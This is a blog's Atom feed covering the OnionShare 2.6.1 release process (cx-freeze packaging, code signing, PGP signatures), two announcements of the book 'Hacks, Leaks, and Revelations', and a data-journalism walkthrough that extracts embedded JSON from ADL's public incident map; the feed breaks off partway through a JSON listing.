feed.xmlurn:uuid:56d41380-d242-312c-a7ee-322f4203756a2024-02-29T00:00:00ZOnionShare 2.6.1 released, and I wasn't even the one who did it!2024-02-29T00:00:00ZMicah Lee, Saptak Senguptaurn:uuid:369a8643-0a2d-3ad3-a134-e8d5bb28a4d1<p>I'm excited to announce that OnionShare 2.6.1 is released — this version includes support for Apple Silicon Macs, among <a href="https://github.com/onionshare/onionshare/releases/tag/v2.6.1">other things</a> — and I'm even more excited that <a href="https://github.com/saptaks">Saptak Sengupta</a>, one of the talented OnionShare maintainers, put in all the work required to make the release, instead of me! Go check out the new version of OnionShare at <a href="https://onionshare.org">onionshare.org</a>.</p>
<p>The following is a cross-post of Saptak's post about making this release, originally published on <a href="https://saptaks.blog/posts/making-my-first-onionshare-release.html">his blog</a>. My favorite part:</p>
<blockquote><p>I was almost sure that since Micah had just made a dev release, most things would go smoothly. But my big mistake was not learning from the pain in Micah's blog.</p>
</blockquote>
<hr>
<h1 id="making-my-first-onionshare-release">Making my first OnionShare release</h1><p><em>By Saptak Segupta, posted: 2024-02-29T18:11:14+05:30</em></p>
<p>One of the biggest bottlenecks in maintaining the <a href="https://onionshare.org/">OnionShare</a> desktop application has been packaging and releasing the tool. Since OnionShare is a cross platform tool, we need to ensure that release works in most different desktop Operating Systems. To know more about the pain that goes through in making an OnionShare release, read the blogs[<a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">1</a>][<a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">2</a>][<a href="https://micahflee.com/2023/10/what-goes-into-making-an-onionshare-release-part-3/">3</a>] that <a href="https://micahflee.com/">Micah Lee</a> wrote on this topic.</p>
<p>However, one other big bottleneck in our release process apart from all the technical difficulties is that Micah has always been the one making the releases, and even though the other maintainers are aware of process, we have never actually made a release. Hence, to mitigate that, we decided that I will be making the OnionShare 2.6.1 release.</p>
<p>PS: Since Micah has written pretty detailed blogs with code snippets, I am not going to include much code snippets (unless I made significant changes) to not lengthen this already long code further. I am going to keep this blog more like a narrative of my experience.</p>
<h2 id="getting-the-hardwares-ready">Getting the hardwares ready</h2><p>Firstly, given the threat model of OnionShare, we decided that it is always good to have a clean machine to do the OnionShare release works, especially the signing part of things. Micah has already automated a lot of the release process using GitHub Actions over the years, but we still need to build the Apple Silicon versions of OnionShare manually and then merge with the Intel version to create a univeral2 app bundle.</p>
<p>Also, in general, it's a good practise to have and use the signing keys in a clean machine for a projective as sensitive as OnionShare that is used by people with high threat models. So I decided to get a new Macbook for the same. This would help me build the Apple Silicon version as well as sign the packages for the other Operating Systems.</p>
<p>Also, I received the HARICA signing keys from Glenn Sorrentino that is needed for signing the Windows releases.</p>
<h2 id="fixing-the-bugs-merging-the-prs">Fixing the bugs, merging the PRs</h2><p>After the 2.6.1-dev release was created, we noticed some bugs that we wanted to fix before making the 2.6.1. We fixed, reviewed and merged most of those bugs. Also, there were few older PRs and documentation changes from contributors that I wanted to be merged before making the release.</p>
<h2 id="translations">Translations</h2><p>Localization is an important part of OnionShare since it enables users to use OnionShare in the language they are most comfortable with. There were quite some translation PRs. Also, <a href="https://github.com/emmapeel2">emmapeel2</a> who always helps us with weblate wizardry, made certain changes in the setup, which I also wanted to include in this release.</p>
<p>After creating the release PR, I also need to check which languages are greater than 90% translated, and make a push to hopefully making some more languages pass that threshold, and finally make the OnionShare release with only the languages that cross that threshold.</p>
<h2 id="making-the-release-pr">Making the Release PR</h2><p>And, then I started making the release PR. I was almost sure that since Micah had just made a dev release, most things would go smoothly. But my big mistake was not learning from the pain in Micah's blog.</p>
<h3 id="updating-dependencies-in-snapcraft">Updating dependencies in Snapcraft</h3><p>Updating the poetry dependencies went pretty smoothly.</p>
<p>There was nothing much to update in the pluggable transport scripts as well.</p>
<p>But then I started updating and packaging for Snapcraft and Flatpak. Updating tor versions to the latest went pretty smoothly. In snapcraft, the python dependencies needed to be compared manually with the <code>pyproject.toml</code>. I definitely feel like we should automate this process in future, but for now, it wasn't too bad.</p>
<p>But trying to build snap with <code>snapcraft</code> locally just was not working for me in my system. I kept getting <code>lxd</code> errors that I was not fully sure what to do about. I decided to move ahead with flatpak packaging and wait to discuss the snapcraft issue with Micah later. I was satisfied that at least it was building through GitHub Actions.</p>
<h3 id="updating-dependencies-in-flatpak">Updating dependencies in Flatpak</h3><p>Even though I read about the hardship that Micah had to go through with updating pluggable transports and python dependencies in flatpak packaging, I didn't learn my lesson. I decided, let's give it a try. I tried updating the pluggable transports and faced the same issue that Micah did. I tried modifying the tool, even manually updating the commits, but something or the other failed.</p>
<p>Then, I moved on to updating the python dependencies for flatpak. The generator code that Micah wrote for desktops worked perfectly, but the cli gave me pain. The format in which the dependencies were getting generated and the existing formats were not matching. And I didn't want to be too brave and change the format, since flatpak isn't my area of expertise. But, python kind of is. So I decided to check if I can update the <code>flatpak-poetry-generator.py</code> files to work. And I managed to fix that!</p>
<p>That helped me update the dependencies in flatpak.</p>
<h2 id="macos-and-windows-signing-fun">MacOS and Windows Signing fun!</h2><h3 id="creating-apple-silicon-app-bundle">Creating Apple Silicon app bundle</h3><p>As mentioned before, we still need to create an Apple Silicon bundle and then merge it with the Intel build generated from CI to get the universal2 app bundle. Before doing that, need to install the poetry dependencies, tor dependencies and the pluggable transport dependencies.</p>
<h4 id="and-i-hit-an-issue-again-our-get-tor-py-script-is-not-working">And I hit an issue again: our get-tor.py script is not working.</h4><p>The script failed to verify the Tor Browser version that we were downloading. This has happened before, and I kind of doubted that Tor PGP script must have expired. I tried verifying manually and seems like that was the case. The subkey used for signing had expired. So I <a href="https://support.torproject.org/tbb/how-to-verify-signature/">downloaded the new Tor Browser Developers signing keys</a>, created a PR, and seems like I could download tor now.</p>
<p>Once that was done, I just needed to run:</p>
<pre><code>/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./setup-freeze.py bdist_mac
rm -rf build/OnionShare.app/Contents/Resources/lib
mv build/exe.macosx-10.9-universal2-3.11/lib build/OnionShare.app/Contents/Resources/
/Library/Frameworks/Python.framework/Versions/3.11/bin/poetry run python ./scripts/build-macos.py cleanup-build
</code></pre>
<p>And amazingly, it built successfully in the very first try! That was easy! Now I just need to merge the Intel app bundle and the Silicon app bundle and everything should work (Spoiler alert: It doesn't!).</p>
<p>Once the app bundle was created, it was time to sign and notarize. However, the process was a little difficult for me to do since Micah had previously used an individual account. So I passed on the universal2 bundle to him and moved on to signing work in Windows.</p>
<h3 id="signing-the-windows-package">Signing the Windows package</h3><p>I had to boot into my Windows 11 VM to finish the signing and making the windows release. Since this was the first time I was doing the release, I had to first get my VM ready by <a href="https://github.com/onionshare/onionshare/blob/main/RELEASE.md#windows-release">installing all the dependencies</a> needed for signing and packaging. I am not super familiar with Windows development environment so had to figure out adding PATH and other such things to make all the dependencies work. The next thing to do was setting up the HARICA smart card.</p>
<h4 id="setting-up-the-harica-smart-card">Setting up the HARICA smart card</h4><p>Thankfully, Micah had already done this before so he was able to help me out a bit. I had to log into the control panel, download and import certificates to my smart card and change the token password and administrator password for my smart card. Apart from the UI of the SafeNet client not being the best, everything else went mostly smoothly.</p>
<p>Since Micah had already made some changes to fix the code signing and packaging stuff, it went pretty smooth for me and I didn't face much obstructions. <a href="https://scidsg.org/">Science & Design</a>, founded by Glenn Sorrentino (who designed the beautiful OnionShare UX!), has taken on the role of fiscal sponsor for OnionShare and hence the package now gets signed under the name of <code>Science and Design Inc.</code></p>
<p>Meanwhile, Micah had got back to me saying that the universal2 bundle didn't work.</p>
<h3 id="so-the-apple-silicon-bundle-didn-t-work">So, the Apple Silicon bundle didn't work</h3><p>One of the mistakes that I made was I didn't test my Apple Silicon build. I thought I will test it once it is signed and notarized. However, Micah confirmed that even after signing and notarizing, the universal2 build is not working. It kept giving <code>segmentation fault</code>. Time to get back to debugging.</p>
<h4 id="downgrading-cx-freeze-to-6.15.9">Downgrading cx-freeze to 6.15.9</h4><p>The first thought that came to my mind was, Micah had made a dev build in October 2023. So the cx-freeze release from that time should still be building correctly. So I decided to try and do <code>build</code> (instead of <code>bdist_mac</code>) with the cx-freeze version at that time (which was <code>6.15.9</code>) and check if the binary created works. And thankfully, that did work. I tried with <code>6.15.10</code> and it didn't. So I decided to stick to <code>6.15.9</code>.</p>
<p>So let's try now running <code>bdist_mac</code>, create a <code>.app</code> bundle and hopefully everything will work perfectly! But nope! The command failed with <code>OnionShare.app/Contents/MacOS/frozen_application_license.txt: No such file or directory</code>. So now I had a decision to make, should I try to monkey-patch this and just figure out how to fix this or try to make the latest cx-freeze work. I decided to give the latest cx-freeze (version <code>6.15.15</code>) another try.</p>
<h4 id="trying-zip-include-packages">Trying zip_include_packages</h4><p>So, one thing I noticed we were doing differently than what cx-freeze documentation and examples for PySide6 mentioned was we put our dependencies in <code>packages</code>, instead of <code>zip_include_packages</code> in the setup options.</p>
<pre><code> "build_exe": {
"packages": [
"cffi",
"engineio",
"engineio.async_drivers.gevent",
"engineio.async_drivers.gevent_uwsgi",
"gevent",
"jinja2.ext",
"onionshare",
"onionshare_cli",
"PySide6",
"PySide6.QtCore",
"PySide6.QtGui",
"PySide6.QtWidgets",
],
"excludes": [
"test",
"tkinter",
...
],
...
}
</code></pre>
<p>So I thought, let's try moving all of the depencies into <code>zip_include_packages</code> from <code>packages</code>. Basically <code>zip_include_packages</code> includes the dependencies in the zip file, whereas <code>packages</code> place them in the file system and not the zip file. My guess was, the Apple Silicon configuration of how a <code>.app</code> bundle should be structured has changed. So the new options looked something like this:</p>
<pre><code> "build_exe": {
"zip_include_packages": [
"cffi",
"engineio",
"engineio.async_drivers.gevent",
"engineio.async_drivers.gevent_uwsgi",
"gevent",
"jinja2.ext",
"onionshare",
"onionshare_cli",
"PySide6",
"PySide6.QtCore",
"PySide6.QtGui",
"PySide6.QtWidgets",
],
"excludes": [
"test",
"tkinter",
...
],
...
}
</code></pre>
<p>So I created a build using that, ran the binary, and it gave an error. But I was happy, because it wasn't <code>segmentation fault</code>. The error mainly because it was not able to import some functions from <code>onionshare_cli</code>. So as a next step, I decided to move everything apart from <code>onionshare</code> and <code>onionshare_cli</code> to <code>zip_include_packages</code>. It looked something like this:</p>
<pre><code> "build_exe": {
"packages": [
"onionshare",
"onionshare_cli",
],
"zip_include_packages": [
"cffi",
"engineio",
"engineio.async_drivers.gevent",
"engineio.async_drivers.gevent_uwsgi",
"gevent",
"jinja2.ext",
"PySide6",
"PySide6.QtCore",
"PySide6.QtGui",
"PySide6.QtWidgets",
],
"excludes": [
"test",
"tkinter",
...
],
...
}
</code></pre>
<p>This almost worked. Problem was, PySide 6.4 had changed <a href="https://www.qt.io/blog/qt-for-python-release-6.4-is-finally-here">how they deal with ENUMs</a> and we were still using deprecated code. Now, fixing the deprecations would take a lot of time, so I decided to <a href="https://github.com/onionshare/onionshare/issues/1881">create an issue</a> for the same and decided to deal with it after the release.</p>
<p>At this point, I was pretty frustrated, so I decided to do, what I didn't want to do. Just have both <code>packages</code> and <code>zip_include_packages</code>. So I did that, build the binary and it worked. I decided to make the <code>.app</code> bundle. It worked perfectly as well! Great!</p>
<p>I was a little worried that adding the dependencies in both <code>packages</code> and <code>zip_include_packages</code> might increase the size of the bundle, but surprisingle, it actually decreased the size compared to the dev build. So that's nice! I also realized that I don't need to replace the <code>lib</code> directory inside the <code>.app</code> bundle anymore. I ran the cleanup code, hit some <code>FileNotFoundError</code>, tried to find if the files were now in a different location, couldn't find them, decided to put them in a <code>try-except</code> block.</p>
<p>After that, I merged the silicon bundle with Intel bundle to create the universal2 bundle again, sent to Micah for signing, and seems like everything worked!</p>
<h2 id="creating-pgp-signature-for-all-the-builds">Creating PGP signature for all the builds</h2><p>Now that we had all the build files ready, I tried installing and running them all, and seems like everything is working fine. Next, I needed to generate PGP signature for each of the build files and then create a GitHub release. However, Micah is the one who has always created signatures. So the options for us now were:</p>
<ul>
<li>create an OnionShare GPG key that everyone uses</li>
<li>sign with my GPG and update documentations to reflect the same</li>
</ul>
<p>The issue with creating a new OnionShare GPG key was distribution. The maintainers of OnionShare are spread across timezones and continents. So we decided to create signature with my GPG and update the documentation on how to verify the downloads.</p>
<h2 id="concluding-the-release">Concluding the release</h2><p>Once the signatures were done, the next steps were mostly straightforward:</p>
<ul>
<li>Create a GitHub release</li>
<li>Publish onionshare-cli on PyPi</li>
<li>Push the build and signatures to the onionshare.org servers and update the website and docs</li>
<li>Create PRs in Flathub and Homebrew cask</li>
<li>Make the snapcraft edge to stable</li>
</ul>
<p>The above went pretty smooth without much difficulty. Once everything was merged, it was time to make an announcement. Since Micah has been doing the announcements, we decided to stick with that for the release so that it reaches to more people.</p>
How to buy Hacks, Leaks, and Revelations, and how to get it for free2024-01-09T00:00:00ZMicah Leeurn:uuid:6b1a5b35-de2c-347b-b678-30ff72719b4c<p>Today, my book <em><a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a></em> is available for sale wherever books are sold! My goal with this book is to teach journalists, researchers, and activists all the skills they need to download and analyze any datasets they get their hands on, finding all of the juicy revelations they might contain. No prior experience is required. You can think of following along with my book as taking a complete course where you'll download real leaked datasets, and then (by following alongside the exercises) learn the tools and coding required to analyze them.</p>
<p>The paperback costs about $50 and the ebook costs about $40. However, I don't want the price to be a barrier to access to anyone who needs this information. For this reason, I also decided to release the book under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) license. In other words, I'm giving away the book online for free.</p>
<h1 id="how-to-buy-hacks-leaks-and-revelations">How to buy <em>Hacks, Leaks, and Revelations</em></h1><p>Here are a few ways you can buy a copy of my book:</p>
<ul>
<li><strong>Buy directly from the publisher:</strong> If you order the book <a href="https://nostarch.com/hacks-leaks-and-revelations">directly from No Starch Press</a>, you can get <em>25% off until January 15 using the discount code <strong>HLR25</strong>.</em> No Starch sells physical books and ebooks, and the physical book comes with the ebook for free.</li>
<li><strong>Buy from your local indie bookshop:</strong> If you have a local independent bookshop you like, go in and let them know you want to buy my book. They can order a copy of it for you, and they get some of the money.</li>
<li><strong>Buy from Bookshop.org to support indie bookshops:</strong> If you order online <a href="https://bookshop.org/a/100026/9781718503120">from Bookshop.org</a>, they'll ship it to you and a portion of the profit will go towards indie bookshops.</li>
<li><strong>Buy from Amazon, if you must:</strong> If really want to get it from Amazon, it's available there too (like everything else). Here's the <a href="https://amzn.to/3NboS6c">Kindle book</a>, and here's the <a href="https://amzn.to/46M5P9R">print book</a>.</li>
</ul>
<h1 id="how-to-get-it-for-free">How to get it for free</h1><p>You can read entire <em>Hacks, Leaks, and Revelations</em> in its entirety on the book's website. <a href="https://hacksandleaks.com/contents.html">Start reading here</a>, at the table of contents. Enjoy!</p>
<p>If you find my book useful and enjoyable, and can afford it, consider buying a copy. The physical book is a lot nicer to read than the online versuib, and if you buy the ebook you can get it in PDF, EPUB and MOBI formats, allowing you to read it on ebook readers.</p>
<h1 id="other-ways-to-help">Other ways to help</h1><p>If you want to support <em>Hacks, Leaks, and Revelations</em> and get more people to read it, here are some thing you can do:</p>
<ul>
<li><strong>Ask your local library to get it:</strong> I did this myself and it was easy! Go to your public library, talk to a librarian, and request that they get a copy of the book. The ISBN-13 number is 978-1718503120. With any luck, it will show up on the shelves there. If you're a student, you can try the same at your school library.</li>
<li><strong>Goodreads:</strong> If you use Goodreads, head over to my book's <a href="https://www.goodreads.com/book/show/121019646-hacks-leaks-and-revelations">Goodreads page</a> and mark it as "Want to Read," or as "Reading" if you have a copy. Once you're done, give it a rating and review. The more people do these things, the more Goodreads recommendation algorithm will show it to others.</li>
<li><strong>Amazon:</strong> Give my book a rating and/or review <a href="https://amzn.to/46M5P9R">on Amazon</a>. This will make it rise in the rankings, more people will be exposed to it, and so forth.</li>
</ul>
<p><em>Update January 14: Instead of offering a PDF download, I've made the entire book available on the website at <a href="https://hacksandleaks.com/">hacksandleaks.com</a>.</em></p>
Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data2023-12-05T00:00:00ZMicah Leeurn:uuid:30767d7c-bec3-3173-94dd-4a9824e80090<p>After just about two years of writing, hacking, analyzing, writing some more, and editing, I'm ridiculously excited to announce that I'm now a published author! As of today, my book <em><a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations</a></em> is <a href="https://hacksandleaks.com/buy.html">for sale</a>.</p>
<p>Technically, the official release date is January 9, 2024, but it ships today if you <a href="https://nostarch.com/hacks-leaks-and-revelations">order it directly from the publisher,</a> No Starch Press (the physical book includes the DRM-free ebook too). If you order it from anywhere else, like <a href="https://bookshop.org/p/books/hacks-leaks-and-revelations/18834681">bookshop.org to support independent bookshops</a>, or Amazon if you want <a href="https://amzn.to/3NboS6c">the Kindle version</a>, it will be available January 9.</p>
<p>If you're considering getting this book, now would be a great time to buy it. These initial sales will go a long way in showing that there's interest in the book. Bookshops will take this as a good sign that they should have copies on their shelves, it's more likely to appear higher up on new release lists, and so forth.</p>
<p>So what's this book about anyway? Here's an excerpt from the <a href="https://hacksandleaks.com/introduction.html">introduction</a>:</p>
<blockquote><p>Unlike any other point in history, hackers, whistleblowers, and archivists now routinely make off with terabytes of data from governments, corporations, and extremist groups. These datasets often contain gold mines of revelations in the public interest, and in many cases are freely available for anyone to download. Yet these digital tomes can prove extremely difficult to analyze or interpret, and few people today have the skills to do so.</p>
<p>I wrote this book for journalists, researchers, hacktivists, and anyone else who wants to learn the technologies and coding skills required to investigate these troves of hacked or leaked data. I don’t assume any prior knowledge. Along with lessons on programming and technical tools, I’ve incorporated many anecdotes and firsthand tips from the trenches of investigative journalism. In a series of hands-on projects, you’ll work with real datasets, including those from police departments, fascist groups, militias, a Russian ransomware gang, and social networks. Throughout, you’ll engage head-on with the dumpster fire that is 21st-century current events: the rise of neofascism and the rejection of objective reality, the extreme partisan divide, and an internet overflowing with misinformation.</p>
<p>By the end of the book, you’ll have gained the skills to download and analyze your own datasets, extracting the revelations they contain and transforming previously unintelligible information into your own groundbreaking reports.</p>
</blockquote>
<p>In October, I gave a talk about this book to a room full of hackers at BSides Portland. If you're interested in learning more before diving in, check out a recording of the talk:</p>
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/3p7I1qRYjOs?si=TJFzy0-zE7sRq_8c" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe><p>If you'd like to buy <em>Hacks, Leaks, and Revelations</em>, here are your options:</p>
<ul>
<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Buy now from the publisher</a> (includes a print book and a free ebook)</li>
<li><a href="https://bookshop.org/p/books/hacks-leaks-and-revelations/18834681">Pre-order from bookshop.org</a> (supports local bookshops, ships January 9)</li>
<li><a href="https://amzn.to/3NboS6c">Pre-order for Kindle</a> (if you like reading on your Kindle, delivers January 9)</li>
</ul>
CASE STUDY: Extracting data from ADL's "Antisemitic Incidents and Anti-Israel Rallies" map2023-11-13T00:00:00ZMicah Leeurn:uuid:6e1583dc-6278-3afe-98b6-4bb4a42f95e0<p>On Saturday, I <a href="https://theintercept.com/2023/11/11/palestine-israel-protests-ceasefire-antisemitic/">published an article</a> for The Intercept about how the Anti-Defamation League has included dozens of Gaza ceasefire protests that were organized by progressive Jews in <a href="https://www.adl.org/stand-with-israel">its map</a> of "antisemitic incidents and anti-Israel rallies," alongside genuine antisemitic vandalism, harassment, and assault by neo-Nazis.</p>
<p>ADL doesn't publish its raw data, but I managed to get it anyway while doing this reporting. In the spirit of sharing data journalism skills, I will show you exactly how I extracted it from the map.</p>
<p><img src="grand-central-station.jpg" alt="Thousands of Jews protesting ceasefire">
<em>Several thousand Jews and their allies occupied Grand Central Station on October 27 demanding a ceasefire in Gaza -- the largest sit-in in NYC since the Iraq War protests. This is one of the "anti-Israel rallies" that ADL put on its map alongside neo-Nazi hate. Credit: <a href="https://www.instagram.com/p/Cy67JZoAcsI/">@jewishvoiceforpeace on Instagram</a></em></p>
<p>In my article I wrote:</p>
<blockquote><p>While ADL doesn’t distribute its raw data in a usable format, when you load the map in a web browser, behind the scenes your browser downloads a copy of it. By monitoring what my browser downloaded while loading the map, I was able to extract a copy of the data and save it as a spreadsheet. The raw data is full of duplicates. After de-duplicating it, I ended up with a spreadsheet with 1,163 “antisemitic incidents and anti-Israel rallies.”</p>
</blockquote>
<p>In this post I explain how I found the data in the HTML of ADL's map in JSON format, how I converted it into a spreadsheet, and how I de-duplicated this spreadsheet, including with the help of the AI systems GitHub Copilot and ChatGPT's GPT-4. If you follow along, you'll end up with a usable copy of ADL's dataset yourself.</p>
<p>While I'm at it, I'll point to the different chapters in my book <em><a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations</a></em> that provide further reading for each topic. (The official release date of my book is in early January 2024, but if you're in the U.S. and order it directly from the publisher, they should start shipping it at the end of this month.)</p>
<p>You can find ADL's map here: <a href="https://www.adl.org/stand-with-israel">https://www.adl.org/stand-with-israel</a></p>
<h2 id="downloading-adl-s-map-data">Downloading ADL's map data</h2><p>If you load ADL's Stand With Israel page and scroll down, you'll find the map full of data points. By using my browser's web developer tools, it was quickly clear that this map itself is an iframe:</p>
<p><img src="adl-iframe.png" alt="Firefox developer tools showing that the ADL map is an iframe"></p>
<p>The iframe is loaded from this URL: <a href="https://flo.uri.sh/visualisation/15425214/embed?auto=1&faIframeUniqueId=ov1dxrbrqr&jsid=null&hostURL=https%3A%2F%2Fwww.adl.org%2Fstand-with-israel">https://flo.uri.sh/visualisation/15425214/embed?auto=1&faIframeUniqueId=ov1dxrbrqr&jsid=null&hostURL=https%3A%2F%2Fwww.adl.org%2Fstand-with-israel</a></p>
<p>If you load that URL directly, you'll see just the map, with all of ADL's data visualized on it:</p>
<p><img src="adl-map.png" alt="The web page for ADL's map, loaded from flo.uri.sh"></p>
<p>If you view the source, you'll see that the HTML includes JavaScript which has a copy of the raw data in it, in the variable <code>_Flourish_data</code>:</p>
<p><img src="adl-view-source.png" alt="The HTML source code of the map"></p>
<p>This HTML page scrolls horizontally -- there is a <em>lot</em> of data here, all stored in that one variable. Let's take a look at it in a text editor where I can turn on word wrapping. First, I download a copy of the HTML by using <code>wget</code> in a terminal:</p>
<div class="hll"><pre><span></span>wget<span class="w"> </span>-O<span class="w"> </span>map.html<span class="w"> </span><span class="s2">"https://flo.uri.sh/visualisation/15425214/embed?auto=1&faIframeUniqueId=ov1dxrbrqr&jsid=null&hostURL=https%3A%2F%2Fwww.adl.org%2Fstand-with-israel"</span>
</pre></div>
<p>This command downloads that URL and saves it in the file <code>map.html</code>. Then, I can open it in Visual Studio Code by running:</p>
<div class="hll"><pre><span></span>code<span class="w"> </span>map.html
</pre></div>
<p>Chapters 3 and 4 of my book introduce you how to use the terminal, and the <code>wget</code> command, to do work just like this. It's designed for beginners who have never touched the command line before, and might even be scared of it. It also shows you how to start working with VS Code as a text editor.</p>
<p>After downloading it, I can tell that <code>map.html</code> is about 1MB, and most of this disk space is used up by giant JSON objects defined inside the JavaScript. Here's a screenshot of viewing <code>map.html</code> in VS Code:</p>
<p><img src="map-html-vscode.png" alt="Viewing map.html in VS Code"></p>
<h2 id="viewing-the-json-data">Viewing the JSON data</h2><p>You can already tell that the raw data is here, but it's incredibly difficult to read. To make it easier, I'll copy line 30 (which is the line that sets the variable <code>_Flourish_data</code> to a huge JSON object) to my clipboard and paste it into its own file. This line starts with:</p>
<pre><code>_Flourish_data = {"lines":[],"points":[{"color":"Assault","lat":32.7241,"lon":-117.171,"metadata":["10/7/2023","An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."
</code></pre>
<p>I deleted the <code>_Flourish_data =</code> at the beginning, so that this file contains nothing but JSON data, and now starts like this:</p>
<pre><code>{"lines":[],"points":[{"color":"Assault","lat":32.7241,"lon":-117.171,"metadata":["10/7/2023","An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."
</code></pre>
<p>I then saved this file as <code>data.json</code>. In the bottom-right of the VS Code window it says "JSON," which means that my text editor thinks this is JSON file. With the <code>data.json</code> tab selected, I press Command-Shift-P, and type "format document", press enter, and save. This formats the JSON document with spacing that makes it reasonable for humans to read.</p>
<p>After formatting, it takes up 23,267 lines (at least it does for me right now as I'm writing this -- ADL is continually adding data to their map, so there will likely be more lines for you if you follow along). Here's how it starts:</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"lines"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span>
<span class="w"> </span><span class="nt">"points"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Assault"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lat"</span><span class="p">:</span><span class="w"> </span><span class="mf">32.7241</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lon"</span><span class="p">:</span><span class="w"> </span><span class="mf">-117.171</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"10/7/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"San Diego"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"California"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Assault"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"No"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"10/7/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="w"> </span><span class="p">},</span>
</pre></div>
<p>This is what formatted JSON data looks like.</p>
<p>Chapter 11 of my book teaching you how to work with data in the JSON file format, using the Parler dataset of over a million videos uploaded to the far-right social networking site Parler, including thousands of videos of the January 6, 2021, insurrection at the US Capitol.</p>
<p>JSON is <em>everywhere</em>, so if you want to do this type of work, it's important to understand how it works and how to work with it.</p>
<p>This JSON objects has a <code>lines</code> key that's an empty array, followed by a <code>points</code> key that is an array of points. Each point looks like it's an incident on ADL's map. It includes a <code>color</code> (which is a category, like "Assault"), <code>lat</code> and <code>lon</code> GPS coordinates, <code>metadata</code> about the incident, a <code>name</code> (which is just the date, like "10/7/2023"), and a <code>value</code> that seems to be an empty array.</p>
<p>The <code>metadata</code> is an array with 6 strings in it. It's pretty clear what most of them mean, but not so much the last item. Here's the metadata from above:</p>
<div class="hll"><pre><span></span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"10/7/2023"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"An individual wearing jewelry with Jewish symbols was allegedly assaulted by an attacker who grabbed their necklace and ring and shouted antisemitic statements."</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"San Diego"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"California"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Assault"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"No"</span>
<span class="p">],</span>
</pre></div>
<p>It looks like this metadata is ordered like this:</p>
<ul>
<li>date</li>
<li>description</li>
<li>city</li>
<li>state</li>
<li>category</li>
<li>some boolean value of "Yes" or "No"</li>
</ul>
<p>I looked back at the <code>map.html</code> code and saw that there's also a JavaScript variable defined called <code>_Flourish_data_column_names</code>. Doing the same thing -- copying and pasting it into its own file in VS Code, and then formatting it, here's what that variable contains:</p>
<div class="hll"><pre><span></span><span class="p">{</span>
<span class="w"> </span><span class="nt">"lines"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"geometry"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"points"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"color"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lat"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Latitude"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"lon"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Longitude"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span>
<span class="w"> </span><span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Description"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"City"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"State"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="w"> </span><span class="s2">"Israel/Zionism-related"</span>
<span class="w"> </span><span class="p">],</span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"value"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span>
<span class="w"> </span><span class="p">},</span>
<span class="w"> </span><span class="nt">"regions"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nt">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"FIPS"</span><span class="p">,</span>
<span class="w"> </span><span class="nt">"metadata"</span><span class="p">:</span><span class="w"> </span><span class="p">[],</span>
